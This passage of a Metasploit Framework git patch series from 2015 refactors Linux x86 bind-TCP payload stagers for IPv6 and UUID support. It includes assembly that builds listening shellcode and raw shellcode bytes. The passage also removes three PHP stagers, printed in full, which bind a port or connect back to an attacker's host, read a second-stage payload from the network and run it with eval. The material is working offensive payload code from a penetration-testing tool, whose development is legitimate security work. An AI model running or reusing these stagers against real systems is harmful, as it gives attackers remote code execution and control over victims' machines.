             if rx = /^Encryption:\s(?<cipher>[-a-z0-9]+?)[\r\n]/.match(ppk.to_s)
-                private_key['Cipher'] = rx[:cipher]
+              private_key['Cipher'] = rx[:cipher]
             else
-                private_key['Cipher'] = '(Unrecognised)'
+              private_key['Cipher'] = '(Unrecognised)'
             end
 
             if rx = /^Comment:\s(?<comment>.+?)[\r\n]/.match(ppk.to_s)
-                private_key['Comment'] = rx[:comment]
+              private_key['Comment'] = rx[:comment]
             end
           end
           private_key_summary << private_key
@@ -236,9 +236,9 @@ class Metasploit3 < Msf::Post
       # If the private key file has been configured, retrieve it and save it to loot
       print_status("Downloading private keys...")
       private_key_info = grab_private_keys(all_saved_sessions)
-      if (!private_key_info.nil? && !private_key_info.empty?)
+      if !private_key_info.nil? && !private_key_info.empty?
         print_line
-        display_private_key_analysis(private_key_info) 
+        display_private_key_analysis(private_key_info)
       end
     end
 

From e7f80042d401298d74268e1a6c1c99b632e4a3c2 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 21:19:04 +1000
Subject: [PATCH 0113/1013] Finalise work on the bind_ipv6_tcp stager for UUID
 support

---
 lib/msf/core/payload/linux/bind_tcp.rb        | 37 +++++++-
 .../stagers/linux/x86/bind_ipv6_tcp.rb        | 88 +++++--------------
 .../stagers/linux/x86/bind_ipv6_tcp_uuid.rb   | 45 ++++++++++
 3 files changed, 101 insertions(+), 69 deletions(-)
 create mode 100644 modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb

diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb
index 148ae17c7e..a8de052bc6 100644
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -46,6 +46,10 @@ module Payload::Linux::BindTcp
     false
   end
 
+  def use_ipv6
+    false
+  end
+
   #
   # Generate and compile the stager
   #
@@ -82,7 +86,13 @@ module Payload::Linux::BindTcp
   def asm_bind_tcp(opts={})
 
     #reliable     = opts[:reliable]
-    encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+    af_inet = 2
+
+    if use_ipv6
+      af_inet = 0xa
+    end
+
+    encoded_port = "0x%.8x" % [opts[:port].to_i, af_inet].pack("vn").unpack("N").first
 
     asm = %Q^
       bind_tcp:
@@ -99,7 +109,7 @@ module Payload::Linux::BindTcp
         push ebx                      ; PROTO
         inc ebx                       ; SYS_SOCKET and SOCK_STREAM
         push ebx
-        push 0x2                      ; SYS_BIND and AF_INET
+        push #{af_inet}               ; SYS_BIND and AF_INET(6)
         mov ecx,esp
         mov al,0x66                   ; socketcall syscall
         int 0x80                      ; invoke socketcall (SYS_SOCKET)
@@ -124,15 +134,38 @@ module Payload::Linux::BindTcp
 
         pop ebx
         pop esi
+    ^
+
+    if use_ipv6
+      asm << %Q^
+        push 2
+        pop ebx
+        push edx
+        push edx
+        push edx
+        push edx
+        push edx
+        push edx
+        push #{encoded_port}
+        mov ecx,esp
+        push 0x1c
+      ^
+    else
+      asm << %Q^
         push edx
         push #{encoded_port}
         push 0x10
+      ^
+    end
+
+    asm << %Q^
         push ecx
         push eax
         mov ecx,esp
         push 0x66                     ; socketcall syscall
         pop eax
         int 0x80                      ; invoke socketcall (SYS_BIND)
+
         shl ebx,1                     ; SYS_LISTEN
         mov al,0x66                   ; socketcall syscall (SYS_LISTEN)
         int 0x80                      ; invoke socketcall
diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
index 6550d656a2..15401bb9b6 100644
--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
@@ -1,87 +1,41 @@
+
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/linux/bind_tcp'
 
-# Linux Bind TCP/IPv6 Stager
-module Metasploit3
+module Metasploit4
 
-  CachedSize = 85
+  CachedSize = 110
 
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::BindTcp
 
   def self.handler_type_alias
-    "bind_ipv6_tcp"
+    'bind_ipv6_tcp'
   end
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Bind TCP Stager (IPv6)',
-      'Description' => 'Listen for a connection over IPv6',
-      'Author'      => [
-          'kris katterjohn', # original
-          'egypt',           # NX support
-        ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'linux',
-      'Arch'        => ARCH_X86,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Stager'      => {
-          'Offsets' => { 'LPORT' => [ 0x18, 'n' ] },
-          'Payload' =>
-
-            "\x6a\x7d"             +#   push byte +0x7d
-            "\x58"                 +#   pop eax
-            "\x99"                 +#   cdq
-            "\xb2\x07"             +#   mov dl,0x7
-            "\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
-            "\x89\xe3"             +#   mov ebx,esp
-            "\x66\x81\xe3\x00\xf0" +#   and bx,0xf000
-            "\xcd\x80"             +#   int 0x80
-            "\x31\xdb"             +#   xor ebx,ebx
-            "\xf7\xe3"             +#   mul ebx
-            "\x53"                 +#   push ebx
-            "\x43"                 +#   inc ebx
-            "\x53"                 +#   push ebx
-            "\x6a\x0a"             +#   push byte +0xa
-            "\x89\xe1"             +#   mov ecx,esp
-            "\xb0\x66"             +#   mov al,0x66
-            "\xcd\x80"             +#   int 0x80
-            "\x43"                 +#   inc ebx
-            "\x52"                 +#   push edx
-            "\x52"                 +#   push edx
-            "\x52"                 +#   push edx
-            "\x52"                 +#   push edx
-            "\x52"                 +#   push edx
-            "\x52"                 +#   push edx
-            "\x68\x0a\x00\xbf\xbf" +#   push dword 0xbfbf000a
-            "\x89\xe1"             +#   mov ecx,esp
-            "\x6a\x1c"             +#   push byte +0x1c
-            "\x51"                 +#   push ecx
-            "\x50"                 +#   push eax
-            "\x89\xe1"             +#   mov ecx,esp
-            "\x6a\x66"             +#   push byte +0x66
-            "\x58"                 +#   pop eax
-            "\xcd\x80"             +#   int 0x80
-            "\xd1\xe3"             +#   shl ebx,1
-            "\xb0\x66"             +#   mov al,0x66
-            "\xcd\x80"             +#   int 0x80
-            "\x43"                 +#   inc ebx
-            "\xb0\x66"             +#   mov al,0x66
-            "\x89\x51\x04"         +#   mov [ecx+0x4],edx
-            "\xcd\x80"             +#   int 0x80
-            "\x93"                 +#   xchg eax,ebx
-            "\xb6\x0c"             +#   mov dh,0xc
-            "\xb0\x03"             +#   mov al,0x3
-            "\xcd\x80"             +#   int 0x80
-            "\x89\xdf"             +#   mov edi,ebx
-            "\xff\xe1"              #   jmp ecx
-
-        }
+      'Name'          => 'Bind IPv6 TCP Stager (Linux x86)',
+      'Description'   => 'Listen for an IPv6 connection (Linux x86)',
+      'Author'        => [ 'kris katterjohn', 'egypt' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Convention'    => 'sockedi',
+      'Stager'        => { 'RequiresMidstager' => true }
       ))
   end
+
+  def use_ipv6
+    true
+  end
+
 end
diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
new file mode 100644
index 0000000000..1f944b7a9a
--- /dev/null
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
@@ -0,0 +1,45 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/linux/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 110
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Linux::BindTcp
+
+  def self.handler_type_alias
+    'bind_ipv6_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Bind IPv6 TCP Stager with UUID support (Linux x86)',
+      'Description'   => 'Listen for an IPv6 connection with UUID support (Linux x86)',
+      'Author'        => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Convention'    => 'sockedi',
+      'Stager'        => { 'RequiresMidstager' => true }
+      ))
+  end
+
+  def use_ipv6
+    true
+  end
+
+  def include_send_uuid
+    true
+  end
+
+end

From 28abceaec5559d369cb7594eea85e98687345db3 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 21:22:54 +1000
Subject: [PATCH 0114/1013] Update payload sizes and specs

---
 modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb   |  2 +-
 .../payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb  |  2 +-
 modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb   |  2 +-
 .../payloads/stagers/linux/x86/reverse_tcp_uuid.rb    |  2 +-
 spec/modules/payloads_spec.rb                         | 11 +++++++++++
 5 files changed, 15 insertions(+), 4 deletions(-)

diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
index 15401bb9b6..9afb60b3f1 100644
--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/core/payload/linux/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 110
+  CachedSize = 120
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::BindTcp
diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
index 1f944b7a9a..6128aa18c2 100644
--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/core/payload/linux/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 110
+  CachedSize = 165
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::BindTcp
diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
index 9bae106ea4..ca16347a58 100644
--- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/linux/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 146
+  CachedSize = 155
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::BindTcp
diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
index 60eeecb7ab..f31c72d104 100644
--- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 229
+  CachedSize = 236
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index bd5083c12d..493bd720cc 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1331,6 +1331,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp'
   end
 
+  context 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/linux/x86/bind_ipv6_tcp_uuid',
+                              'stages/linux/x86/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp_uuid'
+  end
+
   context 'linux/x86/meterpreter/bind_nonx_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From 24526c2ef9f2492b951772b183f70c8b1cab83c2 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 21:46:05 +1000
Subject: [PATCH 0115/1013] Removed unused data files

---
 data/php/bind_tcp.php      | 56 --------------------------------------
 data/php/bind_tcp_ipv6.php | 53 ------------------------------------
 data/php/reverse_tcp.php   | 56 --------------------------------------
 3 files changed, 165 deletions(-)
 delete mode 100755 data/php/bind_tcp.php
 delete mode 100755 data/php/bind_tcp_ipv6.php
 delete mode 100755 data/php/reverse_tcp.php

diff --git a/data/php/bind_tcp.php b/data/php/bind_tcp.php
deleted file mode 100755
index a987fd4b31..0000000000
--- a/data/php/bind_tcp.php
+++ /dev/null
@@ -1,56 +0,0 @@
-#<?php
-
-# The payload handler overwrites this with the correct LPORT before sending
-# it to the victim.
-$port = 4444;
-$ipaddr = "0.0.0.0";
-
-if (is_callable('stream_socket_server')) {
-	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
-	if (!$srvsock) { die(); }
-	$s = stream_socket_accept($srvsock, -1);
-	fclose($srvsock);
-	$s_type = 'stream';
-} elseif (is_callable('socket_create_listen')) {
-	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
-	if (!$res) { die(); }
-	$s = socket_accept($srvsock);
-	socket_close($srvsock);
-	$s_type = 'socket';
-} elseif (is_callable('socket_create')) {
-	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-	$res = socket_bind($srvsock, $ipaddr, $port);
-	if (!$res) { die(); }
-	$s = socket_accept($srvsock);
-	socket_close($srvsock);
-	$s_type = 'socket';
-} else {
-	die();
-}
-if (!$s) { die(); }
-
-switch ($s_type) {
-case 'stream': $len = fread($s, 4); break;
-case 'socket': $len = socket_read($s, 4); break;
-}
-if (!$len) {
-	# We failed on the main socket.  There's no way to continue, so
-	# bail
-	die();
-}
-$a = unpack("Nlen", $len);
-$len = $a['len'];
-
-$b = '';
-while (strlen($b) < $len) {
-	switch ($s_type) {
-	case 'stream': $b .= fread($s, $len-strlen($b)); break;
-	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
-	}
-}
-
-# Set up the socket for the main stage to use.
-$GLOBALS['msgsock'] = $s;
-$GLOBALS['msgsock_type'] = $s_type;
-eval($b);
-die();
diff --git a/data/php/bind_tcp_ipv6.php b/data/php/bind_tcp_ipv6.php
deleted file mode 100755
index cb845096fd..0000000000
--- a/data/php/bind_tcp_ipv6.php
+++ /dev/null
@@ -1,53 +0,0 @@
-#<?php
-
-# The payload handler overwrites this with the correct LPORT before sending
-# it to the victim.
-$port = 4444;
-$ipaddr = "::";
-
-if (is_callable('stream_socket_server')) {
-	$srvsock = stream_socket_server("tcp://[{$ipaddr}]:{$port}");
-	if (!$srvsock) { die(); }
-	$s = stream_socket_accept($srvsock, -1);
-	$s_type = 'stream';
-} elseif (is_callable('socket_create_listen')) {
-	$srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP);
-	if (!$res) { die(); }
-	$s = socket_accept($srvsock);
-	$s_type = 'socket';
-} elseif (is_callable('socket_create')) {
-	$srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
-	$res = socket_bind($srvsock, $ipaddr, $port);
-	if (!$res) { die(); }
-	$s = socket_accept($srvsock);
-	$s_type = 'socket';
-} else {
-	die();
-}
-if (!$s) { die(); }
-
-switch ($s_type) { 
-case 'stream': $len = fread($s, 4); break;
-case 'socket': $len = socket_read($s, 4); break;
-}
-if (!$len) {
-	# We failed on the main socket.  There's no way to continue, so
-	# bail
-	die();
-}
-$a = unpack("Nlen", $len);
-$len = $a['len'];
-
-$b = '';
-while (strlen($b) < $len) {
-	switch ($s_type) { 
-	case 'stream': $b .= fread($s, $len-strlen($b)); break;
-	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
-	}
-}
-
-# Set up the socket for the main stage to use.
-$GLOBALS['msgsock'] = $s;
-$GLOBALS['msgsock_type'] = $s_type;
-eval($b);
-die();
diff --git a/data/php/reverse_tcp.php b/data/php/reverse_tcp.php
deleted file mode 100755
index 935b744628..0000000000
--- a/data/php/reverse_tcp.php
+++ /dev/null
@@ -1,56 +0,0 @@
-#<?php
-
-error_reporting(0);
-# The payload handler overwrites this with the correct LHOST before sending
-# it to the victim.
-$ip = '127.0.0.1';
-$port = 4444;
-$ipf = AF_INET;
-
-if (FALSE !== strpos($ip, ":")) {
-	# ipv6 requires brackets around the address
-	$ip = "[". $ip ."]";
-	$ipf = AF_INET6;
-}
-
-if (($f = 'stream_socket_client') && is_callable($f)) {
-	$s = $f("tcp://{$ip}:{$port}");
-	$s_type = 'stream';
-} elseif (($f = 'fsockopen') && is_callable($f)) {
-	$s = $f($ip, $port);
-	$s_type = 'stream';
-} elseif (($f = 'socket_create') && is_callable($f)) {
-	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
-	$res = @socket_connect($s, $ip, $port);
-	if (!$res) { die(); }
-	$s_type = 'socket';
-} else {
-	die('no socket funcs');
-}
-if (!$s) { die('no socket'); }
-
-switch ($s_type) { 
-case 'stream': $len = fread($s, 4); break;
-case 'socket': $len = socket_read($s, 4); break;
-}
-if (!$len) {
-	# We failed on the main socket.  There's no way to continue, so
-	# bail
-	die();
-}
-$a = unpack("Nlen", $len);
-$len = $a['len'];
-
-$b = '';
-while (strlen($b) < $len) {
-	switch ($s_type) { 
-	case 'stream': $b .= fread($s, $len-strlen($b)); break;
-	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
-	}
-}
-
-# Set up the socket for the main stage to use.
-$GLOBALS['msgsock'] = $s;
-$GLOBALS['msgsock_type'] = $s_type;
-eval($b);
-die();

From 923c4274d3236c74c63837df0c6f8ccc58e4a591 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 21:52:33 +1000
Subject: [PATCH 0116/1013] Formatting fixes

---
 .../stagers/linux/x86/bind_ipv6_tcp.rb        | 22 +++++++++----------
 .../stagers/linux/x86/bind_ipv6_tcp_uuid.rb   | 22 +++++++++----------
 .../payloads/stagers/linux/x86/bind_tcp.rb    | 21 +++++++++---------
 .../stagers/linux/x86/bind_tcp_uuid.rb        |  1 -
 4 files changed, 30 insertions(+), 36 deletions(-)

diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
index 9afb60b3f1..0106b03e01 100644
--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
@@ -1,10 +1,8 @@
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/linux/bind_tcp'
@@ -22,16 +20,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind IPv6 TCP Stager (Linux x86)',
-      'Description'   => 'Listen for an IPv6 connection (Linux x86)',
-      'Author'        => [ 'kris katterjohn', 'egypt' ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'linux',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        => { 'RequiresMidstager' => true }
-      ))
+      'Name'        => 'Bind IPv6 TCP Stager (Linux x86)',
+      'Description' => 'Listen for an IPv6 connection (Linux x86)',
+      'Author'      => [ 'kris katterjohn', 'egypt' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => true }
+    ))
   end
 
   def use_ipv6
diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
index 6128aa18c2..eb3fa79cda 100644
--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
@@ -1,10 +1,8 @@
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/linux/bind_tcp'
@@ -22,16 +20,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind IPv6 TCP Stager with UUID support (Linux x86)',
-      'Description'   => 'Listen for an IPv6 connection with UUID support (Linux x86)',
-      'Author'        => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'linux',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        => { 'RequiresMidstager' => true }
-      ))
+      'Name'        => 'Bind IPv6 TCP Stager with UUID support (Linux x86)',
+      'Description' => 'Listen for an IPv6 connection with UUID support (Linux x86)',
+      'Author'      => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => true }
+    ))
   end
 
   def use_ipv6
diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb
index f41afaae61..d72c328b3e 100644
--- a/modules/payloads/stagers/linux/x86/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/linux/bind_tcp'
@@ -17,16 +16,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind TCP Stager (Linux x86)',
-      'Description'   => 'Listen for a connection (Linux x86)',
-      'Author'        => [ 'skape', 'egypt' ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'linux',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        => { 'RequiresMidstager' => true }
-      ))
+      'Name'        => 'Bind TCP Stager (Linux x86)',
+      'Description' => 'Listen for a connection (Linux x86)',
+      'Author'      => [ 'skape', 'egypt' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => true }
+    ))
   end
 
 end
diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
index ca16347a58..961c976b20 100644
--- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/linux/bind_tcp'

From 4a5f92072e0ec8ef78e65e561ed2a9b9f1c3a190 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 22:00:51 +1000
Subject: [PATCH 0117/1013] Make msftidy happy

---
 modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb | 4 ++--
 modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb      | 4 ++--
 modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb       | 4 ++--
 modules/payloads/stagers/php/bind_tcp_uuid.rb            | 4 ++--
 modules/payloads/stagers/python/bind_tcp_uuid.rb         | 4 ++--
 modules/payloads/stagers/python/reverse_tcp_uuid.rb      | 4 ++--
 modules/payloads/stagers/windows/bind_tcp_uuid.rb        | 4 ++--
 modules/payloads/stagers/windows/reverse_tcp_uuid.rb     | 4 ++--
 modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb    | 4 ++--
 modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb | 4 ++--
 10 files changed, 20 insertions(+), 20 deletions(-)

diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
index eb3fa79cda..7b1e53a378 100644
--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb
@@ -20,8 +20,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Bind IPv6 TCP Stager with UUID support (Linux x86)',
-      'Description' => 'Listen for an IPv6 connection with UUID support (Linux x86)',
+      'Name'        => 'Bind IPv6 TCP Stager with UUID Support (Linux x86)',
+      'Description' => 'Listen for an IPv6 connection with UUID Support (Linux x86)',
       'Author'      => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'linux',
diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
index 961c976b20..ee806bcde8 100644
--- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
@@ -20,8 +20,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Bind TCP Stager, sending UUID (Linux x86)',
-      'Description' => 'Listen for a connection, sending UUID (Linux x86)',
+      'Name'        => 'Bind TCP Stager with UUID Support (Linux x86)',
+      'Description' => 'Listen for a connection with UUID Support (Linux x86)',
       'Author'      => [ 'skape', 'egypt' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'linux',
diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
index a9ea0c45a0..1b48521d2c 100644
--- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb
@@ -20,8 +20,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Bind TCP Stager IPv6 with UUID support',
-      'Description' => 'Listen for a connection over IPv6 with UUID support',
+      'Name'        => 'Bind TCP Stager IPv6 with UUID Support',
+      'Description' => 'Listen for a connection over IPv6 with UUID Support',
       'Author'      => ['egypt'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'php',
diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb
index f2729f810d..1ba9da4899 100644
--- a/modules/payloads/stagers/php/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb
@@ -20,8 +20,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Bind TCP Stager with UUID support',
-      'Description' => 'Listen for a connection with UUID support',
+      'Name'        => 'Bind TCP Stager with UUID Support',
+      'Description' => 'Listen for a connection with UUID Support',
       'Author'      => ['egypt'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'php',
diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb
index 951a9b1c30..ec327de75f 100644
--- a/modules/payloads/stagers/python/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb
@@ -24,8 +24,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Python Bind TCP Stager with UUID support',
-      'Description' => 'Listen for a connection with UUID support',
+      'Name'        => 'Python Bind TCP Stager with UUID Support',
+      'Description' => 'Listen for a connection with UUID Support',
       'Author'      => 'OJ Reeves',
       'License'     => MSF_LICENSE,
       'Platform'    => 'python',
diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
index 472bfbe420..0b5e7878d2 100644
--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -23,8 +23,8 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Python Reverse TCP Stager with UUID support',
-      'Description' => 'Connect back to the attacker with UUID support',
+      'Name'        => 'Python Reverse TCP Stager with UUID Support',
+      'Description' => 'Connect back to the attacker with UUID Support',
       'Author'      => 'OJ Reeves',
       'License'     => MSF_LICENSE,
       'Platform'    => 'python',
diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb
index 4a2a7cfbb0..e95e507495 100644
--- a/modules/payloads/stagers/windows/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb
